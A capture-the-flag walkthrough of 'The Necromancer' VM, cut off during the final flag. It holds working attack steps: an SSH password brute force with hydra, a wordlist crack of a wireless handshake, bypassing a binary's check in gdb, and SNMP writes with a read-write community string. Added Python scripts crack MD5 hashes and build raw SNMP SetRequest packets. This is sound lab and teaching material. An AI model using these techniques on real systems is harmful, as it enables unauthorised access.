The Necromancer CTF VM

Ok, let's get into this.
First, as usual, we start with netdiscover to find the IP of the VM.

netdiscover 00:0c:29:d3:b2:b2 1 60 VMware, Inc.

Opened up Zenmap for this one and ran an intense scan on the IP address.

Nmap scan report for
All 1000 scanned ports on are filtered
MAC Address: 00:0C:29:D3:B2:B2 (VMware)

That doesn't make any sense, all the ports are filtered?!
(Filtered means nmap got no reply at all, not even a RST, so something is dropping our TCP probes rather than the ports simply being closed.) Ok, something is messing with me here. Next I tried a UDP scan to see if it would show anything.

nmap -sS -n -sU -T4 -A -v

After a LONG nmap scan it appears that the only open port is UDP 666. So let's check it out. At first glance there doesn't seem to be anything going on here.
This is really strange! (At this point I started to wonder if I had set the VM up incorrectly)

I decided to take a look with tcpdump at the traffic coming from the VM

tcpdump host

We can see there's a lot of traffic to port 4444: the VM is trying to connect back to us!
Let's set up a listener on that port and see what it's shouting about.

nc -nvlp 4444

After a little while I got a huge alphanumeric text dump.
It looked like base64 text so I decided to see if we could decode the dump.

echo "(the text dump)" | base64 -d ; echo

***** IT WORKED. *****


You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier. 
The air around you begins to get thicker, and your heart begins to beat against your chest. 
You turn to your left.. then to your right! You are trapped!
You fumble through your pockets.. nothing! 
You look down and see you are standing in sand. 
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground! 
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box. 
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. “Chant the string of flag1 — u666”

***** BOOM flag 1 captured *****


The last line of the story seems to reference the UDP port we found earlier. Let's try to reconnect to it now and feed it the flag string.

nc -u 666

You gasp for air! Time is running out!

It seemed to be stuck in a loop at this stage, and whatever I typed in, it just kept repeating

root@kali:~# nc -u 666
flag1You gasp for air! Time is running out!
flag1You gasp for air! Time is running out!
flag1You gasp for air! Time is running out!
flag1You gasp for air! Time is running out!
flag1You gasp for air! Time is running out!

root@kali:~# echo "flag1" | nc -u 666
Chant had no affect!

root@kali:~# echo "e6078b9b1aac915d11b9fd59791030bf" | nc -u 666
Chant had no affect! Try in a different tongue!

This is interesting: "try in a different tongue". Let's see if the flag string is a hash of some kind.
I headed over to and ran the flag string through the hash lookup.

BINGO, it's the MD5 hash of "opensesame". (MD5 isn't reversible; the site simply matches the hash against a precomputed table of hashes of common words, which is why the CTF's "tongue" has to be something guessable.)
So let's try that with our previous command.

echo "opensesame" | nc -u 666

That worked!!!!

A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
As you stand to your feet you notice that you can no longer see the flicker of light in the distance.
You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.
As quickly as the birds appeared, they have left you once again…. alone… tortured by the deafening sound of silence.
666 is closed.

***** Flag 2 captured *****

The last story snippet says port 666 is now closed, but it mentions the number 80.
So let's head over to Firefox and check out port 80.

firefox 192.1678.1.103:80

I found a web page with the text below and an image:

Hours have passed since you first started to follow the crows.
Silence continues to engulf you as you treck towards a mountain range on the horizon.
More times passes and you are now standing in front of a great chasm.
Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.
As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.
The necromancer looks towards you with hollow eyes which can only be described as death.
He smirks in your direction, and suddenly a bright light momentarily blinds you.
The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancers laughs fading as he decends into the cave!
The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.
The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.

There were no real clues in the text, so let's check out the EXIF data on the image to see if there is anything in there.

identify -verbose /root/Desktop/pileoffeathers.jpg
Image: /root/Desktop/pileoffeathers.jpg

Format: JPEG (Joint Photographic Experts Group JFIF format)
 signature: 87b954198b2bf387fcc8ef29706117d736a55d18bddc9679062e509f0c4b3b4d

The only thing of note is the signature
signature: 87b954198b2bf387fcc8ef29706117d736a55d18bddc9679062e509f0c4b3b4d

It looks like something of interest, so let's try and see if we can decode it.

base64 first!

echo "87b954198b2bf387fcc8ef29706117d736a55d18bddc9679062e509f0c4b3b4d" | base64 -d ; echo

That didn't work, and treating it as an MD5 hash didn't give me anything either. In hindsight it never could have: that signature is not stored in the file at all, it is a SHA-256 that ImageMagick itself computes over the decoded pixel data (64 hex digits, twice the length of an MD5), so it is a dead end by construction. Let's try something I read on a forum.

Enter binwalk!! (after a little googling to understand how to use binwalk)

binwalk /root/Desktop/pileoffeathers.jpg
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
27 0x1 Unix path: /"> <rdf:Description rdf:about=”” xmlns:xmp=”" xmlns:xmpMM=”http
36994 0x9082 Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt
37267 0x9193 End of Zip archive

Yes!!! There is a zip archive hidden in the image (appended at byte offset 36994, past the JPEG data). I googled how to extract it and found I could use binwalk to do it with the following command

binwalk -Mre /root/Desktop/pileoffeathers.jpg

Scan Time: 2016–07–14 08:46:04
Target File: /root/Desktop/pileoffeathers.jpg
MD5 Checksum: 2120960eeef27d2810ae08e3d50ef93e
Target File: /root/_pileoffeathers.jpg-0.extracted/feathers.txt
MD5 Checksum: ab301288dadedc081b2216cccfdf03dd
Signatures: 344

I then simply cat the feathers.txt file and get a string that looks like base64

cat /root/_pileoffeathers.jpg-0.extracted/feathers.txt

echo "ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==" | base64 -d ; echo
flag3{9ad3f62db7b91c28b68137000394639f} — Cross the chasm at /amagicbridgeappearsatthechasm

***** Flag 3 captured *****
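Binwalk found the archive by scanning the file for the zip local-file-header signature (the bytes PK\x03\x04) and then carving from that offset. The same trick in a few lines of Python, added here as an example and not part of the original walkthrough or the CTF: scan for the signature, hand each candidate offset to the standard zipfile module, and base64-decode the text inside. The sample "image" and its contents are constructed inline (the real pileoffeathers.jpg is not reproduced); pass a real file path on the command line to run it against an actual image.

```python
import base64
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"  # every zip entry starts with this; binwalk keys on it too


def find_zip_offsets(data: bytes) -> list:
    """All candidate zip starts in a blob (a JPEG may contain false positives)."""
    offsets, start = [], 0
    while (i := data.find(ZIP_LOCAL_HEADER, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets


def carve_zip(data: bytes):
    """Return (offset, {name: bytes}) for the first offset that is a real zip, else (None, {}).

    zipfile tolerates junk before an archive (it locates the central directory from the end),
    so a false-positive signature earlier in the file could still "open"; we only accept an
    offset when the first entry's local header sits exactly at it.
    """
    for off in find_zip_offsets(data):
        try:
            with zipfile.ZipFile(io.BytesIO(data[off:])) as zf:
                entries = zf.infolist()
                if entries and entries[0].header_offset != 0:
                    continue
                return off, {info.filename: zf.read(info) for info in entries}
        except zipfile.BadZipFile:
            continue
    return None, {}


def decode_base64_text(blob: bytes) -> str:
    """feathers.txt held base64; decode it the way `base64 -d` does."""
    return base64.b64decode(blob.strip()).decode()


# --- constructed sample, standing in for pileoffeathers.jpg ------------------
# Minimal JPEG-looking header + filler + EOI marker (ff d9); not a valid picture.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 64 + b"\xff\xd9"
SAMPLE_SECRET = "example{constructed} - Cross the chasm at /some/path"


def build_sample() -> bytes:
    """Append a zip containing base64 text to the fake JPEG, as the CTF image did."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("feathers.txt", base64.b64encode(SAMPLE_SECRET.encode()).decode())
    return SAMPLE_JPEG + buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    off, files = carve_zip(data)
    if off is None:
        print("no embedded zip found")
    for name, content in files.items():
        print(f"zip at offset {off} (0x{off:x}): {name} ({len(content)} bytes)")
        try:
            print(decode_base64_text(content))
        except ValueError:
            print(content[:200])
```

The offset check is the part worth keeping even when you have binwalk: binwalk -e reports where the signature was, but it is the central-directory-relative header offset that tells you whether the bytes at that position are really the start of the archive.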

This seems to want us to check out the address /amagicbridgeappearsatthechasm

So back to Firefox,
and we get another web page with the text below and an image again.

You cautiously make your way across chasm.
You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.
The cave before you is protected by some sort of spell cast by the necromancer.
You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.
Hastily you take a few steps back away from the cave entrance.
There must be a magical item that could protect you from the necromancer’s spell.

Nothing really jumps out from the text, and running binwalk on the image doesn't help us either this time.
I googled how to see if a jpg file had data hidden in it and came across a tool called exiftool.

Let's download it and see if it can help

apt-get install exiftool

exiftool /root/Desktop/magicbook.jpg
ExifTool Version Number : 10.20
File Name : magicbook.jpg
Directory : /root/Desktop
File Size : 154 kB
File Modification Date/Time : 2016:07:14 08:59:21-04:00
File Access Date/Time : 2016:07:14 08:59:24-04:00
File Inode Change Date/Time : 2016:07:14 08:59:21-04:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 600
Image Height : 450
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 600x450
Megapixels : 0.270

Nothing really helpful or suspicious here. I'm at a dead end :-(
Time for a break, I think, and a chance to think about what to do next. I need to find a magic item that can protect from the spell?!

After reading a bit of the walkthrough on IRC, people there were talking about a program called gobuster and searching for the magic item on the server using a list of magic items they had created.

FULL DISCLOSURE I downloaded their magic item list and used it with gobuster.

I didn't have gobuster installed at this point, so I installed it and ran it with -h

Gobuster v1.1 OJ Reeves (@TheColonial)
WordList (-w): Must be specified
Url/Domain (-u): Must be specified

root@kali:~# gobuster -u -w /root/Desktop/magicitems.txt

Gobuster v1.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain :
[+] Threads : 10
[+] Wordlist : /root/Desktop/magicitems.txt
[+] Status codes : 302,307,200,204,301
/talisman (Status: 200)

Perfect, the magic-items list got a hit: /talisman returns 200.

root@kali:~# wget
--2016-07-14 11:48:35--
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 9676 (9.4K) [application/octet-stream]
Saving to: ‘talisman’
talisman 100%[====================================>] 9.45K --.-KB/s in 0.001s
2016-07-14 11:48:35 (13.7 MB/s) - ‘talisman’ saved [9676/9676]

root@kali:~# ls
talisman

(The file needed execute permission before it could be run.)

root@kali:~# chmod 700 talisman

root@kali:~# ls

root@kali:~# ./talisman

BOOM!! That was SO hard I almost gave up.

You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?

I tried answering the question with


base64-encoded "yes" as eWVzCg==
md5sum of "yes" as eb4585ad9fe0426781ed7c49252f8225

Nothing seemed to work. Back to google again, where I found that I could run the strings command on the talisman file to list the readable text embedded in the binary.

The strings that piqued my interest were two function names, wearTalisman and chantToBreakSpell. The natural guess is that wearTalisman is the routine asking the question and chantToBreakSpell is the one that prints the chant, so rather than finding the right answer we can let gdb break on the first function and jump straight into the second, skipping the check altogether (jump just sets the instruction pointer, which is why it only works once the program is actually running). This is the usual lesson about client-side gates: a check inside a binary you hold can always be stepped over, and anything the binary is able to print, you can make it print.

gdb talisman
(gdb) b wearTalisman
Breakpoint 1 at 0x804852d
(gdb) jump chantToBreakSpell
The program is not being run.
(gdb) run
Starting program: /root/talisman

Breakpoint 1, 0x0804852d in wearTalisman ()
(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.

You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337
[Inferior 1 (process 2702) exited normally]

***** Flag 4 captured *****

Ok that was hard. But after a quick break and a mental regroup, let's move on to the next challenge. It looks like we need to send some text to UDP port 31337.

echo "ea50536158db50247e110a6c89fcf3d3" | nc -u 31337
Chant had no affect! Try in a different tongue!

Ok so let's head back over to and run the flag string through it and see what it comes back as.

ea50536158db50247e110a6c89fcf3d3 md5 = blackmagic

Brilliant, that looks perfect, so let's "chant" that at the UDP port.

echo "blackmagic" | nc -u 31337

and it worked, we got the following text.

As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until…. silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.



***** Flag 5 Captured *****
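Both chants so far (opensesame at u666, blackmagic at u31337) followed the same pattern: pull the hex out of the flag, find the word whose MD5 matches it, fire that word at a UDP port and read the reply. This is an added example, not the author's code or anything shipped with the CTF: it does the hash matching offline against a wordlist (the same thing the online lookup does with a precomputed table), and wraps the nc -u exchange in a socket with a timeout so a silent port returns instead of leaving you "stuck in a loop". Host and port are arguments; the default wordlist path is assumed to be Kali's rockyou.txt.

```python
import hashlib
import re
import socket


def md5_hex(word) -> str:
    """MD5 of a str (UTF-8) or of raw bytes, as lowercase hex."""
    data = word.encode() if isinstance(word, str) else word
    return hashlib.md5(data).hexdigest()


def flag_hash(flag_text: str):
    """Pull the 32 hex digits out of something like flag1{e607...}; None if absent."""
    m = re.search(r"\{([0-9a-fA-F]{32})\}", flag_text)
    return m.group(1).lower() if m else None


def crack_md5(target_hex: str, candidates):
    """Offline version of the online lookup: hash each candidate, compare, return the match.

    candidates may be str or bytes (e.g. a wordlist opened in binary mode); trailing
    newlines are stripped because that is how wordlists are stored.
    """
    target = target_hex.strip().lower()
    for cand in candidates:
        cand = cand.rstrip(b"\r\n") if isinstance(cand, bytes) else cand.rstrip("\r\n")
        if md5_hex(cand) == target:
            return cand
    return None


def crack_with_wordlist(target_hex: str, path="/usr/share/wordlists/rockyou.txt"):
    """Stream a wordlist in binary mode (rockyou.txt is not valid UTF-8 throughout)."""
    with open(path, "rb") as fh:
        hit = crack_md5(target_hex, fh)
    return hit.decode(errors="replace") if hit is not None else None


def chant(host: str, port: int, word: str, timeout: float = 3.0):
    """Send one newline-terminated line to a UDP service and return its reply.

    UDP has no connection, so "nothing comes back" is all we ever learn from a
    wrong port or a filter; a timeout returns None instead of hanging like nc -u.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(word.encode() + b"\n", (host, port))
        try:
            return s.recvfrom(4096)[0].decode(errors="replace")
        except socket.timeout:
            return None


def crack_and_chant(host, port, flag_text, candidates):
    """The full move from the walkthrough: flag -> hash -> word -> chant -> story text."""
    target = flag_hash(flag_text)
    if target is None:
        return None, None
    word = crack_md5(target, candidates)
    if word is None:
        return None, None
    if isinstance(word, bytes):
        word = word.decode(errors="replace")
    return word, chant(host, port, word)


if __name__ == "__main__":
    import sys
    # usage: python chant.py HOST PORT 'flagN{hex}' [WORDLIST]
    host, port, flag = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    path = sys.argv[4] if len(sys.argv) > 4 else "/usr/share/wordlists/rockyou.txt"
    with open(path, "rb") as fh:
        word, reply = crack_and_chant(host, port, flag, fh)
    print("chant:", word)
    print(reply if reply is not None else "no reply within timeout")
```

Reading the wordlist as bytes matters more than it looks: rockyou.txt contains lines that are not valid UTF-8, and decoding them before hashing would change the bytes and miss any such candidate.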

Ok, let's check out the address we just found using Firefox.

That was easy, we found flag number 6.

***** Flag 6 Captured *****

along with the flag we also got the next part of the story:

You continue to make your way through the cave.
In the distance you can see a familiar flicker of light moving in and out of the shadows.
As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.
You move closer, and then stop frozen with fear.

It’s the necromancer!

Again he stares at you with deathly hollow eyes.
He is standing in a doorway; a staff in one hand, and an object in the other.
Smirking, the necromancer holds the staff and the object in the air.
He points his staff in your direction, and the stench of death and decay begins to fill the air.
You stare into his eyes and then…….
…… darkness. You open your eyes and find yourself lying on the damp floor of the cave.
The amulet must have saved you from whatever spell the necromancer had cast.
You stand to your feet. Behind you, only darkness.
Before you, a large door with the symbol of a skull engraved into the surface.
Looking closer at the skull, you can see u161 engraved into the forehead.

Ok so I guess we have to go back and nc the UDP 161 port. After connecting to it I didn't get any response at all; going on the same idea as the last few ports, I think it needs us to "chant" something at it.


I have to admit at this point I wasted so much time messing around trying to get a response from the port.
I opened listeners on the port and threw all sorts of words and commands at it, to no success.

It was at this stage that I decided to head back to the web page, and it was there I FINALLY noticed the word necromancer was a hyperlink. (I feel a little silly for not noticing it sooner.)
So after downloading the file and running some commands on it I found it was a bz2 file

root@kali:~/Downloads# tar -xf necromancer.out
root@kali:~/Downloads# ls -la

-rw-r--r-- 1 root root 10355 Jul 15 13:40 necromancer
-rw-r--r-- 1 root root 80242 May 10 03:36 necromancer.cap
-rw-r--r-- 1 root root 81920 Jul 15 13:40 necromancer.out

So it turns out the compressed file contained a .cap packet capture of wireless traffic.

root@kali:~/Downloads# tcpdump -r necromancer.cap
This just gave me a complete dump of the packets with not much to go on. I decided to try and crack the .cap file using aircrack-ng: a wordlist attack with aircrack-ng only works if the capture contains a WPA/WPA2 handshake, and the key it finds is the Wi-Fi passphrase.

aircrack-ng /root/Downloads/necromancer.cap -w /usr/share/wordlists/rockyou.txt

KEY FOUND! [ death2all ]

So again loads of time wasted "chanting" death2all at the port and nothing seemed to happen at all. I did a quick google search and found out that UDP 161 is SNMP.
I have no idea what to do with an SNMP port, so I think I'm going to have to go back to google and learn some new commands.

Ok so I found a post about scanning SNMP ports from Metasploit using snmp_enum. Switching to msfconsole

msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) >
[-] Unknown command:
msf auxiliary(snmp_enum) > set rhosts
rhosts =>
msf auxiliary(snmp_enum) > set community death2all
community => death2all
msf auxiliary(snmp_enum) > run

[+], Connected.

[*] System information:

Host IP :
Hostname : Fear the Necromancer!
Description : You stand in front of a door.
Contact : The door is Locked. If you choose to defeat me, the door must be Unlocked.
Location : Locked — death2allrw!
Uptime snmp : -
Uptime system : -
System date : -

So we are a step forward: we have talked to the port and we get the above message. The door seems locked; we need to find out what the door is and how to unlock it. My first thought is around this line:

Location : Locked — death2allrw!

The rw suffix suggests death2allrw is a second, read-write SNMP community string (death2all, which snmp_enum accepted, would be the read-only one). SNMPv1/v2c has no authentication beyond that string, so whoever knows the read-write community can change any writable value on the agent. Let's first walk the tree to find where the Locked string lives.

root@kali:~# snmpwalk -v 2c -c death2all
iso. = STRING: “You stand in front of a door.”
iso. = STRING: “The door is Locked. If you choose to defeat me, the door must be Unlocked.”
iso. = STRING: “Fear the Necromancer!”
iso. = STRING: “Locked — death2allrw!”

This shows the OID of the Locked string is iso.

root@kali:~# snmpwalk -v 2c -c death2allrw iso. s Unlocked
iso. = STRING: “Locked — death2allrw!”

Ok so we can see the string says "Locked — death2allrw!" and we need it to say "Unlocked". snmpwalk is read-only, so this was never going to change anything.

So this took a while and a bit more googling to learn how to change the string, but eventually I found out how, and the command was

root@kali:~# snmpset -v 2c -c death2allrw iso. s Unlocked
iso. = STRING: “Unlocked”

It took ages, but all it turned out to need was a simple change from snmpwalk to snmpset (with s to say the value is a string), and the write was accepted because death2allrw is the read-write community. Ok, let's run snmp_enum in Metasploit again.
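What made snmpset work is worth spelling out, because it is the whole security lesson of this stage: SNMPv1/v2c has no authentication beyond the community string, and that string travels in cleartext inside every datagram. The following is an added example, not code from the walkthrough or from the CTF, that builds the same GetRequest and SetRequest messages that snmpget and snmpset send, as raw BER, and includes a small parser showing exactly what a passive sniffer recovers from each packet (version, community, operation). It assumes the Location string lives at sysLocation.0 (OID 1.3.6.1.2.1.1.6.0), since the page's OIDs are not shown; the request-id values are arbitrary.

```python
import socket

SNMP_V2C = 1  # on the wire, version 1 means "v2c" (0 is v1)
GET_REQUEST, GET_NEXT, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA1, 0xA2, 0xA3
SYS_LOCATION_0 = "1.3.6.1.2.1.1.6.0"  # assumption: sysLocation.0; the page's OIDs were stripped


def _ber_len(n: int) -> bytes:
    """BER length: one byte below 128, else 0x80|count followed by big-endian length."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(payload)) + payload


def enc_int(v: int) -> bytes:
    if v < 0:
        raise ValueError("only non-negative integers are needed here")
    # (bit_length + 8) // 8 leaves the sign bit clear, e.g. 128 -> 00 80
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def enc_str(s: str) -> bytes:
    return _tlv(0x04, s.encode())


def enc_null() -> bytes:
    return b"\x05\x00"


def enc_seq(*items: bytes) -> bytes:
    return _tlv(0x30, b"".join(items))


def enc_oid(oid: str) -> bytes:
    """Dotted OID -> BER: first two arcs packed as 40*a+b, the rest base-128, high bit = more."""
    arcs = [int(a) for a in oid.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body.extend(reversed(chunk))
    return _tlv(0x06, bytes(body))


def snmp_message(community: str, pdu_tag: int, request_id: int, varbinds) -> bytes:
    """SNMPv2c message: SEQUENCE { version, community, PDU { id, err, err-idx, varbinds } }."""
    vbl = enc_seq(*(enc_seq(enc_oid(oid), value) for oid, value in varbinds))
    pdu = _tlv(pdu_tag, enc_int(request_id) + enc_int(0) + enc_int(0) + vbl)
    return enc_seq(enc_int(SNMP_V2C), enc_str(community), pdu)


def get_request(community: str, oid: str, request_id: int = 1) -> bytes:
    return snmp_message(community, GET_REQUEST, request_id, [(oid, enc_null())])


def set_request(community: str, oid: str, value: str, request_id: int = 1) -> bytes:
    """What `snmpset -v 2c -c <community> <oid> s <value>` puts on the wire."""
    return snmp_message(community, SET_REQUEST, request_id, [(oid, enc_str(value))])


def _read_tlv(buf: bytes, pos: int):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def observe(datagram: bytes):
    """What anyone sniffing the wire learns from one SNMP datagram: (version, community, pdu tag)."""
    tag, body, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, pos = _read_tlv(body, 0)
    _, community, pos = _read_tlv(body, pos)
    pdu_tag, _, _ = _read_tlv(body, pos)
    return int.from_bytes(version, "big"), community.decode(), pdu_tag


def send(host: str, datagram: bytes, port: int = 161, timeout: float = 3.0) -> bytes:
    """Fire a datagram at the agent and return the raw response (GetResponse, tag 0xA2)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(datagram, (host, port))
        return s.recvfrom(65535)[0]


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else None
    msg = set_request("death2allrw", SYS_LOCATION_0, "Unlocked", request_id=7)
    print("on the wire:", msg.hex())
    print("a sniffer sees (version, community, pdu):", observe(msg))
    if host:
        print("agent replied:", send(host, msg).hex())
```

Two things to take from it: the 40-byte GetRequest the test pins down is byte-for-byte what snmpget emits, and observe() needs no key material at all. Anyone on the path between the Kali box and the VM could have read death2allrw out of the snmpset packet and replayed a SetRequest of their own, which is why SNMPv3 (with authPriv) exists and why v2c write communities should never be reachable from untrusted networks.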

msf auxiliary(snmp_enum) > set rhosts
rhosts =>
msf auxiliary(snmp_enum) > set community death2all
community => death2all
msf auxiliary(snmp_enum) > run

[+], Connected.

[*] System information:

Host IP :
Hostname : Fear the Necromancer!
Description : You stand in front of a door.
Contact : The door is unlocked! You may now enter the Necromancer’s lair!
Location : Unlocked
Uptime snmp : -
Uptime system : -
System date : -

Ok so this seems like a step forward, but now I have to figure out how to enter the lair.

Rerunning snmpget on the same OID once we've changed the string gives us

root@kali:~# snmpget -v 1 -c death2allrw iso.
iso. = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} -t22”

***** Flag 7 Captured *****
flag7{9e5494108d10bbd5f9e7ae52239546c4} -t22

Ok so the next step looks like TCP port 22, which is SSH (-t22 reads as the TCP counterpart of the u666-style hints).
As before I'm jumping over to crackstation to see if the flag hash can be converted into a chant of some kind.

It came back as demonslayer, so let's try to connect to the port with the password demonslayer.

Ok, on the first attempt it didn't work; the password doesn't seem to be accepted.

root@kali:~# ssh 22
root@’s password: demonslayer

Permission denied, please try again.

Which I guess is understandable, as that would be a little too easy this far into the quest.

Ok, back to google!

I'm going for a coffee and a brain rest at this point, maybe something will pop into my head. I need to think of another way to get access using the phrase demonslayer!
Ok so after taking a little break I came to the conclusion that demonslayer must be a username and not a password. So I have the username already and now I need to brute force the password for the SSH connection.

Lets release the hydra!

root@kali:~# hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh://
[DATA] attacking service ssh on port 22
[22][ssh] host: login: demonslayer password: 12345678

Bingo, we now have a username and a password.

Let's try to connect to the port again.

root@kali:~# ssh -l demonslayer
demonslayer@'s password: 12345678


Ooh, this is looking good, we are logged in over SSH. Let's have a look around.

$ ls
$ cat flag8.txt

You enter the Necromancer’s Lair!

A stench of decay fills this place. 
Jars filled with parts of creatures litter the bookshelves.
A fire with flames of green burns coldly in the distance.
Standing in the middle of the room with his back to you is the Necromancer. 
In front of him lies a corpse, indistinguishable from any living creature you have seen before.
He holds a staff in one hand, and the flickering object in the other.
“You are a fool to follow me here! Do you not know who I am!”
The necromancer turns to face you. Dark words fill the air!
“You are damned already my friend. Now prepare for your own death!” 
Defend yourself! Counter attack the Necromancer’s spells at u777!

Ok so it's back to UDP ports again. Let's see if we can connect straight to the port.

nc -u 777

After trying LOADS more times to connect to the UDP port from a separate terminal window, I went back and tried to connect to it via localhost from within the necromancer's "lair".

And it worked (again feeling a little silly at this stage for not thinking of that sooner). The service must only be reachable from the box itself, bound to the loopback interface or filtered from outside, which is why every attempt from the Kali machine went unanswered.

$ nc -u localhost 777

** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?




** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Who did Johann Faust VIII make a deal with?

***** Flag 8 Captured *****

Back to Google for the answer


Who did Johann Faust VIII make a deal with? Mephistopheles

***** Flag 9 Captured *****

** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Who is tricked into passing the Ninth Gate?

Google again…..

The answer I found out was Hedge

***** Flag 10 Captured *****

A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.

(It was at this point that I decided to head over to crackstation to see what the 3 flag hashes were and, in a beautiful stroke of irony, they cracked to the answers to the questions.)
That is a lesson well learnt: I should have just cracked the flag strings instead of trawling through random wiki pages!

Ok, on to the last and final battle.
If the lair is in fact the localhost of the VM, then anything that "appears" in the lair must have appeared somewhere on the box itself, most likely in our home directory. So let's check it out and see what we can find (ls -la rather than plain ls, so that dotfiles show up too).

$ ls -la

-rw-r--r-- 1 demonslayer demonslayer 196 Jul 15 05:02 .smallvile
-rw-r--r-- 1 demonslayer demonslayer 706 May 11 21:19 flag8.txt

$ cat .smallvile

You pick up the small vile.
Inside of it you can see a green liquid.
Opening the vile releases a pleasant odour into the air.
You drink the elixir and feel a great power within your veins!

Ok I can feel it, we are so close now. Given the theme and the wording of the sentence, I think elixir could be the root password.

Let's try it.

SO close yet still so far. Elixir was a no go; that would have been a really easy finish to this quest.
Ok, let's think about it again. We have great power within our veins, so maybe they are referring to sudo (it's a command with great power after all).

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:

User demonslayer may run the following commands on thenecromancer:
 (ALL) NOPASSWD: /bin/cat /root/flag11.txt

This reveals we do indeed have great power. I don't fully understand it right now (google will help with that in a minute) but it looks like we can run a specific command on flag11.txt without using a password.
Ok, let's google this and see what comes back.

After searching with the string NOPASSWD: /bin/cat /root/flag11.txt I found an article explaining the sudoers entry: demonslayer may run exactly /bin/cat /root/flag11.txt as root, and the NOPASSWD tag means sudo won't even prompt for the user's password for that one command.
So I tried to cat /root/flag11.txt directly and got this error

cat: /root/flag11.txt: Permission denied

